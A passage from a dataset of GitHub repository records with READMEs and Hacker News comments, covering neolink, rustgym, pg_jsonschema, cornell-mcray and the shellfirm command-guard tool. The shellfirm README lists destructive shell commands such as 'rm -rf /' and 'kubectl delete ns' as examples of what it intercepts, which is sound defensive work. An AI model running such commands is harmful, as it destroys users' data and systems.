controlling the camera. They are all used through neolink subcommands like this:\n\n```bash\nneolink subcommand --config=...\n```\n\nThe currently supported subcommands are\n\n- **rtsp**: The standard neolink rtsp bridge\n- **status-light**: Control the LED status light\n- **reboot**: Reboot a camera\n- **talk**: Enable talk back through either the microphone or by\n reading a sound file.\n\nFor a full list of commands use `neolink help`, or use\n`neolink help ` for details on a subcommand of interest.\n\n## Download & Installation\n\nBuilds are provided for the following platforms:\n\n- Windows x86_64 ([download][win-ci-download])\n- macOS x86_64 ([download][macos-ci-download])\n- Ubuntu/Debian x86_64 ([download][ubuntu-ci-download])\n- Ubuntu/Debian x86 ([download][debian-x86-ci-download])\n- Debian aarch64 (Raspberry Pi 64-bit) ([download][debian-aarch-ci-download])\n- Debian armhf (Raspberry Pi 32-bit) ([download][debian-armhf-ci-download])\n- Arch Linux ([AUR](https://aur.archlinux.org/packages/neolink-git/))\n- Docker x86 (see below)\n\n### Windows/Linux\n\n1. [Install Gstreamer][gstreamer] from the most recent MSI installer on Windows,\nor your package manager on Linux.\n\n On Ubuntu/Debian machines gstreamer can be installed with:\n\n ```bash\n sudo apt install \\\n libgstrtspserver-1.0-0 \\\n libgstreamer1.0-0 \\\n libgstreamer-plugins-bad1.0-0 \\\n gstreamer1.0-plugins-good \\\n gstreamer1.0-plugins-bad\n ```\n\n\n2. If you are using Windows, add the following to your `PATH` environment variable:\n\n ```\n %GSTREAMER_1_0_ROOT_X86_64%\\bin\n ```\n\n **Note:** If you use Chocolatey to install Gstreamer, it does this\n automatically.\n\n3. Download and unpack Neolink from the links above.\n 1. Note: you can also click on [this link][ci-download] to see all historical builds.\n You will need to be logged in to GitHub to download directly from the builds page (wget doesn't work)\n\n Ubuntu/Debian/Raspberry Pi OS example:\n\n ```bash\n unzip release-arm64-buster.zip\n sudo cp neolink /usr/local/bin/\n sudo chmod +x /usr/local/bin/neolink\n ```\n\n4. Write a configuration file for your cameras. See the section below.\n\n5. Launch Neolink from a shell, passing your configuration file:\n\n ```bash\n neolink rtsp --config my_config.toml\n ```\n\n6. Connect your NVR software to Neolink's RTSP server.\n\n The default URL is `rtsp://127.0.0.1:8554/your_camera_name` if you're running\n it on the same computer.\n If you run it on a different server, you may need to open firewall ports.\n See the \"Viewing\" section below for more troubleshooting.\n\n[gstreamer]: https://gstreamer.freedesktop.org/documentation/installing/index.html\n[ci-download]: https://github.com/thirtythreeforty/neolink/actions?query=workflow%3ACI+branch%3Amaster+\n\n[win-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-windows-2022.zip\n[macos-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-macos-12.zip\n[ubuntu-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-ubuntu-20.04.zip\n[debian-x86-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-i386-buster.zip\n[debian-armhf-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-armhf-buster.zip\n[debian-aarch-ci-download]: https://nightly.link/thirtythreeforty/neolink/workflows/build/master/release-arm64-buster.zip\n\n### Docker\n\nA Docker image is also available containing Neolink and all its dependencies.\nThe image is `thirtythreeforty/neolink`.\nPort 8554 is exposed, which is the default listen port.\nYou must mount a configuration file (see below) into the container at\n`/etc/neolink.toml`.\n\nHere is a sample launch commmand:\n\n```bash\ndocker run \\\n -p 8554:8554 \\\n --restart=on-failure \\\n --volume=$PWD/config.toml:/etc/neolink.toml \\\n thirtythreeforty/neolink\n```\n\nHere is an example docker-compose:\n\n```yml\n---\nversion: \"2\"\nservices:\n neolink:\n image: thirtythreeforty/neolink\n container_name: neolink\n ports:\n - 8554:8554\n volumes:\n - $PWD/neolink.toml:/etc/neolink.toml\n restart: unless-stopped\n```\n\nThe Docker image is \"best effort\" and intended for advanced users; questions\nabout running Docker are outside the scope of Neolink.\n\nIf you use a battery-powered camera (or other UDP-only camera) you will need to either\nuse `--net=host` or setup a [macvlan](https://docs.docker.com/network/macvlan/)\nfor the docker image that supports UDP broadcast.\nThis is because UDP requires that udp broadcast messages are transmitted across\nthe docker network interface, however this is [not possible in the default\nbridging mode](https://github.com/docker/for-linux/issues/637)\n\n\n## Configuration\n\n**Note**: for a more comprehensive setup tutorial, refer to the\n[Blue Iris setup walkthrough in `docs/`][blue-iris-setup] (which is probably\n also helpful even with other NVR software).\n\n**Note**: more comprehensive setup details for linux based devices is provided in\n[docs/unix_setup.md][unix-setup]\n\n**Note**: instructions for also setting up a (systemd based) service for linux\nbased devices is provided in [docs/unix_service.md][unix-service]\n\n[blue-iris-setup]: docs/Setting%20Up%20Neolink%20For%20Use%20With%20Blue%20Iris.md\n[unix-setup]: docs/unix_setup.md\n[unix-service]: docs/unix_service.md\n\nCopy and modify the `sample_config.toml` to specify the address, username, and\npassword for each camera (if there is no password, you can omit that line).\nThe default credentials for some cameras is username `admin` password `123456`.\n\n- For a non battery powered camera you need to provide the address field with the\nip and port (default 9000).\n\n- For a battery powered camera you need to provide the uid field with the\ncamera's UID. In this case your network must support UDP.\nBattery cameras exclusively use this UDP mode so you must always use a UID.\n\nEach `[[cameras]]` block creates a new camera; the `name` determines the RTSP\npath you should connect your client to.\n\nBy default, the HD stream is available at the RTSP path `/name` or\n`/name/mainStream`, and the SD stream is available at `/name/subStream`.\nYou can use only the HD stream by adding `stream = \"mainStream\"` to the\n`[[cameras]]` config, or only the SD stream with `stream = \"subStream\"`.\n\n**Note**: The B400/D400 models only support a single stream at a time, so you\nmust add this line to sections for those cameras.\n\nBy default Neolink serves on all IP addresses on port 8554.\nYou can modify this by changing the `bind` and the `bind_port` parameter.\nYou only need one `bind`/`bind_port` setting at the top of the config file.\n\nYou can enable `rtsps` (TLS) by adding a `certificate = \"/path/to/pem\"` to the\ntop section of the config file. This PEM should contain the certificate\nand the key used for the server. If TLS is enabled all connections must use\n`rtsps`. You can also use client side TLS with the config option\n`tls_client_auth = \"none|request|require\"`; in this case the client should\npresent a certificate signed by the server's CA.\n\nTLS is disabled by default.\n\nYou can password-protect the Neolink server by adding `[[users]]` sections to\nthe configuration file, but this is not secure without also using TLS:\n\n```\n[[users]]\nname: someone\npass: somepass\n```\n\nyou also need to add the allowed users into each camera by adding the following\nto `[[cameras]]`.\n\n```\npermitted_users = [\"someone\", \"someoneelse\"]\n```\n\nAnywhere a username is accepted it can take any username or one of the\nfollowing special values.\n\n- `anyone` means any user with a valid user/pass\n- `anonymous` means no user/pass required\n\nThe default `permitted_users` list is:\n\n- `[ \"anonymous\"]` if no `[[users]]` were given in the config meaning no\nauthentication required to connect.\n\n- `[ \"anyone\" ]` if `[[users]]` were provided meaning any authourised users can\nconnect.\n\nYou can change the Neolink log level by setting the `RUST_LOG` environment\nvariable (not in the configuration file) to one of `error`, `warn`, `info`,\n`debug`, or `trace`:\n\n- On sh:\n\n```sh\nset RUST_LOG=debug\n```\n\n- On Bash:\n\n```bash\nexport RUST_LOG=debug\n```\n\n## Viewing\n\nConnect your RTSP client to the stream with the name you provided in the\nconfiguration file.\n\nAgain, the default URL is `rtsp://127.0.0.1:8554/your_camera_name` if you're\nrunning it on the same computer as the client.\nThe smaller SD video is `rtsp://127.0.0.1:8554/your_camera_name/subStream`.\n\n4K cameras send large video \"key frames\" once every few seconds and the client\nmust have a receive buffer large enough to store the entire frame.\nIf your client's buffer size is configurable (like Blue Iris), ensure it's set\nto 20MB, which should ensure plenty of headroom.\n\n## Stability\n\nNeolink has had minimal testing, but it seems to be very reliable in multiple\nusers' testing.\n\nThe formats of all configuration files and APIs is subject to change as required\nwhile it is pre-1.0.\n\n## Development\n\nNeolink is written in Rust, and binds to Gstreamer to provide RTSP server\nfunctionality.\n\nTo compile, ensure you have the Rust compiler, Gstreamer, and gst-rtsp-server\ninstalled.\n\nThen simply run:\n\n```bash\ncargo build\n```\n\nfrom this top directory.\n\n### Baichuan Protocol\n\nThe \"port 9000\" protocol used by Reolink and some Swann cameras is internally\nreferred to as the Baichuan protocol; this is the company based in China that\nis known internationally as Reolink.\n\nThis protocol is a slightly convoluted header-data format, and appears to have\nbeen upgraded several times.\n\nThe modern variant uses obfuscated XML commands and sends ordinary H.265 or\nH.264 video streams encapsulated in a custom header.\n\nMore details of the on-the-wire protocol are provided in [`dissector/`](dissector/).\n\n### Baichuan dissector\n\nA Wireshark dissector is available for the BC wire protocol in the `dissector`\ndirectory.\n\nIt dissects the BC header and also allows viewing the deobfuscated XML in\ncommand messages.\n(It cannot deobfuscate newer messages that use AES encryption.)\nTo use it, copy or symlink it into your Wireshark plugin directory; typically\nthis is `~/.local/lib/wireshark/plugins/` under Linux.\n\nCurrently the dissector does not attempt to decode the Baichuan \"extension\"\nmessages except `binaryData`.\nThis will change in the future as reverse engineering needs require.\n\n## License\n\nNeolink is free software, released under the GNU Affero General Public License\nv3.\n\nThis means that if you incorporate it into a piece of software available over\nthe network, you must offer that software's source code to your users.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "warycat/rustgym", "link": "https://github.com/warycat/rustgym", "tags": ["leetcode", "rust", "solutions", "macros", "leetcode-rust", "algorithm", "interview", "interview-questions", "interview-preparation", "interview-practice", "trie", "leetcode-solutions", "graph", "tutorial", "hackerrank", "hackerrank-solutions", "advent-of-code"], "stars": 658, "description": "Leetcode Solutions in Rust, Advent of Code Solutions in Rust and more", "lang": "Rust", "repo_lang": "", "readme": "[package]\nname = \"rustgym-readme\"\nversion = \"0.1.0\"\nauthors = [\"Yinchu Xia \"]\nedition = \"2018\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n[dependencies]\nanyhow = \"1.0.35\"\naskama = \"0.10.5\"\nderive-new = \"0.5.8\"\nregex = \"1.4.2\"\nreqwest = { version = \"0.10.7\", features = [\"blocking\", \"json\"] }\nrustgym-consts = { path = \"../consts\" }\nrustgym-schema = { path = \"../schema\" }\nrustgym-util = { path = \"../util\" }\nserde_json = \"1.0.60\"\nwalkdir = \"2.3.1\"\ndiesel = { version = \"1.4.8\", features = [\n \"sqlite\",\n \"r2d2\",\n \"chrono\",\n \"uuidv07\"\n] }\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "supabase/pg_jsonschema", "link": "https://github.com/supabase/pg_jsonschema", "tags": [], "stars": 657, "description": "PostgreSQL extension providing JSON Schema validation", "lang": "Rust", "repo_lang": "", "readme": "# pg_jsonschema\n\n

\n\"PostgreSQL\n\"License\"\n\n

\n\n---\n\n**Source Code**: https://github.com/supabase/pg_jsonschema\n\n---\n\n## Summary\n\n`pg_jsonschema` is a PostgreSQL extension adding support for [JSON schema](https://json-schema.org/) validation on `json` and `jsonb` data types.\n\n\n## API\nSQL functions:\n\n```sql\n-- Validates a json *instance* against a *schema*\njson_matches_schema(schema json, instance json) returns bool\n```\nand \n```sql\n-- Validates a jsonb *instance* against a *schema*\njsonb_matches_schema(schema json, instance jsonb) returns bool\n```\n\n## Usage\nThose functions can be used to constrain `json` and `jsonb` columns to conform to a schema.\n\nFor example:\n```sql\ncreate extension pg_jsonschema;\n\ncreate table customer(\n id serial primary key,\n ...\n metadata json,\n\n check (\n json_matches_schema(\n '{\n \"type\": \"object\",\n \"properties\": {\n \"tags\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n \"maxLength\": 16\n }\n }\n }\n }',\n metadata\n )\n )\n);\n\n-- Example: Valid Payload\ninsert into customer(metadata)\nvalues ('{\"tags\": [\"vip\", \"darkmode-ui\"]}');\n-- Result:\n-- INSERT 0 1\n\n-- Example: Invalid Payload\ninsert into customer(metadata)\nvalues ('{\"tags\": [1, 3]}');\n-- Result:\n-- ERROR: new row for relation \"customer\" violates check constraint \"customer_metadata_check\"\n-- DETAIL: Failing row contains (2, {\"tags\": [1, 3]}).\n```\n\n## JSON Schema Support\n\npg_jsonschema is a (very) thin wrapper around the [jsonschema](https://docs.rs/jsonschema/latest/jsonschema/) rust crate. Visit their docs for full details on which drafts of the JSON Schema spec are supported.\n\n## Try it Out\n\nSpin up Postgres with pg_jsonschema installed in a docker container via `docker-compose up`. The database is available at `postgresql://postgres:password@localhost:5407/app`\n\n\n## Installation\n\n\nRequires:\n- [pgx](https://github.com/tcdi/pgx)\n\n\n```shell\ncargo pgx run\n```\n\nwhich drops into a psql prompt.\n```psql\npsql (13.6)\nType \"help\" for help.\n\npg_jsonschema=# create extension pg_jsonschema;\nCREATE EXTENSION\n\npg_jsonschema=# select json_matches_schema('{\"type\": \"object\"}', '{}');\n json_matches_schema \n---------------------\n t\n(1 row)\n```\n\nfor more complete installation guidelines see the [pgx](https://github.com/tcdi/pgx) docs.\n\n\n## Prior Art\n\n[postgres-json-schema](https://github.com/gavinwahl/postgres-json-schema) - JSON Schema Postgres extension written in PL/pgSQL\n\n[is_jsonb_valid](https://github.com/furstenheim/is_jsonb_valid) - JSON Schema Postgres extension written in C\n\n[pgx_json_schema](https://github.com/jefbarn/pgx_json_schema) - JSON Schema Postgres extension written with pgx + jsonschema\n\n\n## Benchmark\n\n\n#### System\n- 2021 MacBook Pro M1 Max (32GB)\n- macOS 12.4\n- PostgreSQL 14.1\n\n### Setup\nValidating the following schema on 20k unique inserts\n\n```json\n{\n \"type\": \"object\",\n \"properties\": {\n \"a\": {\"type\": \"number\"},\n \"b\": {\"type\": \"string\"}\n }\n}\n```\n\n```sql\ncreate table bench_test_pg_jsonschema(\n meta jsonb,\n check (\n jsonb_matches_schema(\n '{\"type\": \"object\", \"properties\": {\"a\": {\"type\": \"number\"}, \"b\": {\"type\": \"string\"}}}',\n meta\n )\n )\n);\n\ninsert into bench_test_pg_jsonschema(meta)\nselect\n json_build_object(\n 'a', i,\n 'b', i::text\n )\nfrom\n generate_series(1, 200000) t(i);\n-- Query Completed in 2.18 seconds \n```\nfor comparison, the equivalent test using postgres-json-schema's `validate_json_schema` function ran in 5.54 seconds. pg_jsonschema's ~2.5x speedup on this example JSON schema grows quickly as the schema becomes more complex.\n", "readme_type": "markdown", "hn_comments": "Thank you!Some suggestion for the next roadmap:- a Dockerfile ( The dockerfile helps me a lot in trying out new technologies )- info about the compatibility with new PG15- CI/CDI was just looking into this for handling typescript integration with postgres. I think there's a lot of opportunity to make that work really well. Zapatos and pg-typegen are good steps but it could be even better.The `jsonschema` crate author here.First of all, this is an exciting use case, I didn't even anticipate it when started `jsonschema` (it was my excuse to play with Rust). I am extremely pleased to see such a Postgres extension :)At the moment it supports Drafts 4, 6, and 7 + partially supports Draft 2019-09 and 2020-12. It would be really cool if we can collaborate on finishing support for these partially supported drafts! What do you think?If you'll have any bug reports on the validation part, feel free to report them to our issue tracker - https://github.com/Stranger6667/jsonschema-rs/issues.Re: performance - there are a couple of tricks I've been working on, so if anybody is interested in speeding this up, feel free to join here - https://github.com/Stranger6667/jsonschema-rs/pull/373P.S. As for the \"Prior Art\" section, I think that https://github.com/jefbarn/pgx_json_schema should be mentioned there, as it is also based on `pgx` and `jsonschema`.I just love the work both Supabase & Hasura have done making people aware of how powerful Postgres is.How does this validate data with a variable amount of keys with the same value type for example a to-do listmy day to day to do list varies in the number of tasks, but the completion will always be in boolean [\n {\n \"task\": \"do Foo\", \n \"completed\": False, \n }, \n {\n \"task\": \"do Bar\", \n \"completed\": False, \n }, \n {\n \"task\": \"do Baz\", \n \"completed\": False, \n }, \n ...\n ]\n\nAlso, what is the issue of schema validation before inserting into the json column, as this is what I'm doing with a small microservice with Redis.This is awesome -- really excited that Supabase is picking this up with their commitment to open source in general and PG in particular.Some prior art:- https://github.com/gavinwahl/postgres-json-schema (mentioned in the repo)- https://github.com/furstenheim/is_jsonb_validpgx[0] is going to be pretty revolutionary for the postgres ecosystem I think -- there is so much functionality that would benefit from happening inside the database and I can't think of a language I want to use at the DB level more than Rust.[0]: https://github.com/tcdi/pgxNot experienced with Postgres and its ecosystem unfortunately, but all those Postgres extensions popping up on hn lately certainly make me envious. To someone with more insight: How risky is it to rely on those extensions? I guess rust handles the 'accidental data corruption or crashes' aspect. How difficult is it to continue to use such an extension once the original author walks away? Is the extension API somewhat (or perfectly?) stable? Given that this example probably mostly used in CHECK contraints, I guess it could be fairly easy removed or replaced from a running installation?This is awesome! I remember playing with Hasura (which uses Postgres) a few years ago. Hasura is great but one of the things I really wanted was JSON schema validation at a database level so I could keep all the \"raw\" types together if that makes sense. I was then, and do now, do public-facing schema validation but that doesn't necessarily validate how it's going to be persisted into the database so being able to have that closer to the database level now is great.Nice work, however, I am structurally dubious of putting too much functionality onto a classical centralized RDBMS since it can't be scaled out if performance becomes a problem. It's CPU load and it's tying up a connection which is a large memory load (as implemented in postgres, connections are \"expensive\") and since this occurs inside a transaction it's holding locks/etc as well. I know it's all compiled native code so it's about as fast as it can be, but, it's just a question of whether it's the right place to do that as a general concern.I'd strongly prefer to have the application layer do generic json-schema validation since you can spawn arbitrary containers to spread the load. Obviously some things are unavoidable if you want to maintain foreign-key constraints or db-level check constraints/etc but people frown on check constraints sometimes as well. Semantic validity should be checked before it gets to the DB.I was exploring a project with JSON generation views inside the database for coupling the DB directly to SOLR for direct data import, and while it worked fine (and performed fine with toy problems) that was just always my concern... even there where it's not holding write locks/etc, how much harder are you hitting the DB for stuff that, ultimately, can. be done slower but more scalably in an application container?YAGNI, I know, cross the bridge when it comes, butjust as a blanket architectural concern that's not really where it belongs imo.In my case at least, probably it's something that could be pushed off to followers in a leader-follower cluster as a kind of read replica, but I dunno if that's how it's implemented or not. \"Read replicas\" are something that are a lot more fleshed out in Citus, Enterprise, and the other commercial offerings built on raw Postgres iirc.This is really cool. This will make it much simpler to convert from firestore to supabase. \nI think that's the last missing feature that firestore provided which supabase didn't.We are already running a sync process between firestore and postgres. So we can do aggregations on JSON data. At this point it's only a matter of time before we move to superbaseThis is absolutely brilliant.In windmill, https://github.com/windmill-labs/windmill (self-hostable AWS Lambda, OSS AGPLv3) we infer the jsonschema of your script by doing static analysis but so far we were not doing validation of the payload itself, if your script failed because of incorrect payload that was your problem. Now without any additional effort I will be able to add validation and great error reporting \"for free\".If adding this check to an existing table with millions of records, will it scan the entire table checking all of the records, or just check when the records are inserted or updated.As an aside, I'm a long time backend developer writing my first mobile app with Dart/Flutter. I tried the popular backend recommendation in that ecosystem. After weeks wasted on it, I googled \"{PopularBackend} alternatives\" out of frustration and this thing called \"Supabase\" appeared in the results. What a breath of fresh air it's been. It uses Postgres as a backend (with postgREST), which means I can put all those skills to good use (you can go far with all the batteries Postgres comes equipped with: row-level security, triggers, functions, etc). It's open source and the free tier lets me do pretty much all I need for development (and probably for a production MVP). Which means I don't have to worry about \"after questions\" until after.Supabase team keep doing what you're doing!So we\u2019ve come full circle and now JSON is just XML with lighter syntax.I have a very dumb question: why would you use this instead of a traditional schema? I thought the value of json columns was to be partially schemaless and flexibleWhat is the use case for this versus normal column definitions, if you\u2019re looking to enforce schemas?Very cool!I remember when kicking the tires on postgrest/postgraphile that I found validation and error handling to be one of the less intuitive areas. Not the actual field-level constraints, but how to adapt it to fit a fast-fail vs slow-fail model.When I had attempted before, the only ergonomic option was fast-fail (the first check constraint violated would bubble the error upward) rather than slow-fail (collect all invalid fields and return the collection of errors, which IME is more common on average web forms or api requests).Looking at the single code file and tests, I see only singular field errors. Has a more ergonomic approach to validation-error collection been developed other than writing a large function to iterate the new record fieldwise against the schema?It would be valuable to know which JSON-Schema it supports, since there are currently 4 different versions that differ in their capabilities (as one might expect). Related to that, does it honor the \"$schema\" key allowing the schema to declare which version it is?The postgres-json-schema alternative that's mentioned in the repo also ships with what appears to be a conformance test suite; does this carry the same, or was the focus more on speed?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "h3r2tic/cornell-mcray", "link": "https://github.com/h3r2tic/cornell-mcray", "tags": [], "stars": 656, "description": "\ud83d\udd79 A quick'n'dirty game sample using kajiya, physx-rs, and dolly", "lang": "Rust", "repo_lang": "", "readme": "\n\n\n\n\n\n
\n \n# \ud83d\udd79\ufe0f Cornell McRay t'Racing\n\nA quick'n'dirty game sample using [`kajiya`](https://github.com/EmbarkStudios/kajiya), [`physx-rs`](https://github.com/EmbarkStudios/physx-rs), and [`dolly`](https://github.com/h3r2tic/dolly).\n\n![mcray](https://user-images.githubusercontent.com/16522064/146706174-dabbe36a-d846-4550-a6d6-35aa9047c4f6.gif)\n\n
\n\n## System requirements\n\nSee [the `kajiya` readme](https://github.com/EmbarkStudios/kajiya/#platforms).\n\n## Building\n\nClone this repo to the same parent directory that `kajiya` is in:\n\n```\nkajiya/ <- root of the `kajiya` repository\ncornell-mcray/ <- this repository\n```\n\nMake sure the `bake` bin in the `kajiya` folder is built:\n\n```\ncd kajiya\ncargo build --release -p bake\n```\n\nBake the meshes for `cornell-mcray`:\n\n```\ncd cornell-mcray\nbake.cmd\n```\n\n^ replace `bake.cmd` with `./bake.sh` on Linux.\n\n## Running\n\nMake sure `dxcompiler.dll` / `libdxcompiler.so` is in the executable environment.\n\n_(You can grab it from `kajiya` and copy into `cornell-mcray`, or stash it somewhere in the system `PATH`)_\n\nThen run:\n\n```\ncargo run --release\n```\n\n## Controls\n\n* WSAD - driving\n* Shift - nitro\n* B - spawn a box \ud83e\udd37\u200d\u2642\ufe0f\n* Q - party mode \ud83c\udf8a\n\n## License\n\nThis contribution is dual licensed under EITHER OF\n\n* Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or )\n* MIT license ([LICENSE-MIT](LICENSE-MIT) or )\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "No chequer board pattern. Is this even really ray tracing?The astute among you will notice that the outputs look more or less indistinguishable from modern video games -- which is to say, they don't look real.It's not to downplay the achievement. It's to say that I hope one of you takes up the task of making truly real, indistinguishable-from-TV videos generated in real time.It may seem like an impossible dream. But so was realtime raytracing, at the start of my career. And there are a few promising signs that it's coming within reach. ML trained on video, applied to gamedev, seems like a matter of time. You could do it right now.Since the talking point of \"We don't want real-looking outputs!\" always comes up, I suggest ignoring that detail. It's worth doing, even if nobody wanted it, just to show biology who's boss. And incidentally, you'll want to become familiar with how to run blinded experiments, since you'll realize that your own judgement isn't any good when deciding how \"real\" something looks. The sole test is whether human observers can distinguish your outputs from real outputs no better than random chance.I'm not sure people appreciate how many hours of \"hacks\" are going to disappear nearly overnight when real time ray tracing becomes common place. Things as conceptually simple as \"soft shadows\" have multiple manifestations and implementations, and require dozens of hacks to pull off believably.This is incredibleRaytracing is clever. Good for realism. But end of the day, these are games, not simulations. Being blinded by reflective materials periodically doesn't sound like my kinda funThe real time ray tracing is a massive achievement. Tbf I never thought it would be possible to do in my lifetime (and it really isn\u2019t, it\u2019s a lot of impressive smoke and mirrors like reservoir sampling!) but this is really close to a path traced look considering how few samples it really is per pixel.All that aside, what really stands out with this demo is how nice the dev experience is. Lots of bits and pieces that didn\u2019t exist 10 or 20 years ago. It\u2019s git clone and cargo run. The threshold for tinkering with a repo like this compared to an old C++ equivalent is extremely low. I had to try making the day/night sky dynamic and it was literally a two minute job even though I\u2019m a rust newbie.Anyone got a binary? I don't have a good track record with successful compiles.I'm sincerely hoping that whoever wrote this is a hockey fan.(for those who aren't, Connor McDavid is arguably the best hockey player alive today)I don't have a RTX serie so... but I notice on the gif, there is a light leak on that white column, both sides of the base, around 80% of the gif?I thought this was ray tracing but I take it it must still takes shortcuts to do this in real time?Is that a draw distance issue or some other approximation, it reminds me of shadow mapping going wrong.https://github.com/EmbarkStudios/kajiyakajiya currently works on a limited range of operating systems and hardware.Hardware:Nvidia RTX seriesNvidia GTX 1060 and newer (slow: driver-emulated ray-tracing)AMD Radeon RX 6000 seriesThe aesthetic kinda reminds me of the Jet Car Stunts iOS app[1], I wonder if that was an inspiration. JCS had pre-baked lighting textures, which meant it could play well on ancient iOS devices while still looking good - but of course, not quite as good as real-time raytracing.[1] https://apps.apple.com/us/app/jet-car-stunts/id337866370", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kaplanelad/shellfirm", "link": "https://github.com/kaplanelad/shellfirm", "tags": ["rust", "devops", "zsh", "terminal", "shell", "devops-tools", "prompt", "captcha"], "stars": 656, "description": "Intercept any risky patterns (default or defined by you) and prompt you a small challenge for double verification", "lang": "Rust", "repo_lang": "", "readme": "

\n\n\n

\n\n# shellfirm\n\n
\n

Opppppsss you did it again? :scream: :scream: :cold_sweat:

\n
\n\nHow do I save myself from myself?\n* `rm -rf *`\n* `git reset --hard` Before hitting the enter key?\n* `kubectl delete ns` Stop! you are going to delete a lot of resources\n* And many more!\n\nDo you want to learn from other people's mistakes?\n\n`shellfirm` will intercept any risky patterns and immediately prompt a small challenge that will double verify your action, think of it as a captcha for your terminal.\n\n```bash\nrm -rf /\n#######################\n# RISKY COMMAND FOUND #\n#######################\n* You are going to delete everything in the path.\n\nSolve the challenge: 8 + 0 = ? (^C to cancel)\n```\n\n## How does it work?\n`shellfirm` will evaluate all the shell commands behind the scenes.\nIf a risky pattern is detected, you will immediately get a prompt with the relevant warning to verify your command.\n\n## Example\n![](./docs/media/example.gif)\n\n\n## Setup your shell \n\n### Install via brew\n```bash\nbrew tap kaplanelad/tap && brew install shellfirm\n```\n\nOr download the binary file from [releases page](https://github.com/kaplanelad/shellfirm/releases), unzip the file and move to `/usr/local/bin` folder.\n\nValidate shellfirm installation\n```\nshellfirm --version\n```\n\n## Verify installation\n```\nmkdir /tmp/shellfirm\ncd /tmp/shellfirm\ngit reset --hard\n```\n\n## Select your shell\n
\nOh My Zsh\nDownload zsh plugin:\n\n```sh\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.oh-my-zsh.zsh --create-dirs -o ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/shellfirm/shellfirm.plugin.zsh\n```\n\nAdd `shellfirm` to the list of Oh My Zsh plugins when Zsh is loaded(inside ~/.zshrc):\n\n```bash\nplugins=(... shellfirm)\n```\n
\n\n
\nBash\nBash implementation is based on https://github.com/rcaloras/bash-preexec project, which adds a pre-exec hook to catch the command before executing.\n\n```sh\n# Download bash-preexec hook functions. \ncurl https://raw.githubusercontent.com/rcaloras/bash-preexec/master/bash-preexec.sh -o ~/.bash-preexec.sh\n\n# Source our file at the end of our bash profile (e.g. ~/.bashrc, ~/.profile, or ~/.bash_profile)\necho '[[ -f ~/.bash-preexec.sh ]] && source ~/.bash-preexec.sh' >> ~/.bashrc\n\n# Download shellfirm pre-exec function\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.sh -o ~/.shellfirm-plugin.sh\n\n# Load pre-exec command on shell initialized\necho 'source ~/.shellfirm-plugin.sh' >> ~/.bashrc\n```\n
\n\n
\n\nfish\n\n\n```sh\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.fish -o ~/.config/fish/conf.d/shellfirm.plugin.fish\n```\n
\n\n
\nZsh\n\n\n```sh\n# Add shellfirm to conf.d fishshell folder\ncurl https://raw.githubusercontent.com/kaplanelad/shellfirm/main/shell-plugins/shellfirm.plugin.zsh -o ~/.shellfirm-plugin.sh\necho 'source ~/.shellfirm-plugin.sh' >> ~/.zshrc\n```\n
\n\n
\nDocker\n\n* [bash](./docs/docker/bash)\n* [zsh](./docs/docker/zsh)\n
\n\n:information_source: Open a new shell session\n\n:eyes: :eyes: [Verify installation](./README.md#verify-installation) :eyes: :eyes:\n\nYou should get a `shellfirm` prompt challenge. \n\n**If you didn't get the prompt challenge:**\n1. Make sure the `shellfirm --version` returns a valid response.\n2. Make sure that you downloaded the Zsh plugin and added it to the Oh My Zsh plugins in .zshrc.\n\n## Risky commands\nWe have predefined a baseline of risky groups command that will be enabled by default, these are risky commands that might be destructive.\n\n| Group | Enabled By Default |\n| --- | --- |\n| [base](./docs/checks/base.md) | `true` |\n| [git](./docs/checks/git.md) | `true` |\n| [fs](./docs/checks/fs.md) | `true` |\n| [fs-strict](./docs/checks/fs-strict.md) | `false` |\n| [kubernetes](./docs/checks/kubernetes.md) | `false` |\n| [kubernetes-strict](./docs/checks/kubernetes-strict.md) | `false` |\n| [heroku](./docs/checks/heroku.md) | `false` |\n| [terraform](./docs/checks/terraform.md) | `false` |\n\n\n### Add/Remove new group checks\n```bash\nshellfirm config update-groups\n```\n\n## Change challenge:\n\nCurrently we support 3 different challenges when a risky command is intercepted:\n* `Math` - Default challenge which requires you to solve a math question.\n* `Enter` - Required only to press `Enter` to continue.\n* `Yes` - Required typing `yes` to continue.\n\nYou can change the default challenge by running the command:\n```bash\nshellfirm config challenge\n```\n\n*At any time you can cancel a risky command by hitting `^C`*\n\n## Ignore pattern:\n\nYou can disable one or more patterns in a selected group by running the command:\n```bash\nshellfirm config ignore\n```\n## Deny pattern command:\n\nRestrict user run command by select pattern id's that you not allow to run in the shell:\n```bash\nshellfirm config deny\n```\n\n## To Upgrade `shellfirm`\n```bash\nbrew upgrade shellfirm\n```\n\n## Contributing\nThank you for your interest in contributing! Please refer to [contribution guidelines](./CONTRIBUTING.md) for guidance.\n\n# Copyright\nCopyright (c) 2022 [@kaplanelad](https://github.com/kaplanelad). See [LICENSE](LICENSE.txt) for further details.\n\n", "readme_type": "markdown", "hn_comments": "This should be a small, easy to read bash script.Not a plethora of rust files that compile to a binary.I would never trust this thing to not cause more issues, unless it is so small and elegant, that I can audit it very easily and be very very sure it is safe.One thing not clear from readme: Will it detect if it's in a TTY or might it also trigger from commands triggered inside shell scripts?I frequently do `git reset --hard`, knowing what I am doing, until I found that I probably need the code a few days later.Perhaps I just need a tool to intercept this and backup the affected files somewhere. The files can be deleted after some time (a week? or never?). And when I 